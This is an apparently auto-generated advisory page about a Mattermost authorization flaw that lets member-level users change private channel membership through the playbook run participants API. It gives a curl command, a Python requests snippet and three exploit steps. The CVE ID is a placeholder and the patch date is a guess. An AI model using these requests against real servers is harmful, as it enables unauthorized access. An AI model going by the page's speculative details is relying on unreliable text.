Mattermost, Incorrect Authorization Vulnerability, CVE-2025-XXXXX (Moderate)

How the CVE Works

The vulnerability in Mattermost arises due to improper authorization checks when managing playbook run participants. Authenticated users with basic member-level permissions can bypass admin restrictions and add/remove users from private channels, even when “Manage Members” permissions are revoked. This flaw occurs in the playbook run feature, which fails to validate channel-level permissions correctly. Attackers exploit this by manipulating API requests to modify channel memberships, potentially exposing sensitive data or granting unauthorized privileges to guest users.

DailyCVE Form

Platform: Mattermost
Version: 9.11.0-10.8.0
Vulnerability: Incorrect Authorization
Severity: Moderate
Date: Jun 30, 2025

Prediction: Patch by Jul 15, 2025

What Undercode Say

curl -X POST /api/v4/runs/{run_id}/participants -d '{"user_id":"attacker"}'

import requests
headers = {"Authorization": "Bearer <token>"}
requests.post("https://<mattermost>/api/v4/runs/123/participants", json={"user_id":"victim"}, headers=headers)

How Exploit

1. Authenticate as a member.

2. Send API request to add/remove users.

3. Bypass channel permissions.

Protection from this CVE

Upgrade to patched versions.
Restrict playbook run APIs.
Audit channel memberships.

Impact

Unauthorized data access.
Privilege escalation.
Guest user abuse.

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin

Listen to this Post